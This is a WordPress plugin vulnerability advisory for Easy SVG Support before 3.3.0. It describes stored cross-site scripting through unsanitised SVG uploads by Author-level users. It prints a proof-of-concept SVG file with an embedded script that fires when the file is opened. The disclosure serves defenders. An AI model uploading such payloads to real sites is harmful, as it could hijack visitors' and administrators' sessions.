WordPress Plugin Vulnerabilities
Easy SVG Support < 3.3.0 - Author+ Stored Cross Site Scripting via SVG
Description
The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads
Proof of Concept
As an author or above, upload the below SVG file via the Media library: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" /> <script type="text/javascript"> alert(/XSS/); </script> </svg> The XSS will be triggered when accessing the file directly, e.g https://example.com/wp-content/uploads/2022/05/xss.svg
Affects Plugins
Fixed in version 3.3.0
References
Classification
Miscellaneous
Original Researcher
Luan Pedersini
Submitter
IBLISS Digital Security
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-06-01 (about 3 months ago)
Added
2022-06-01 (about 3 months ago)
Last Updated
2022-06-01 (about 3 months ago)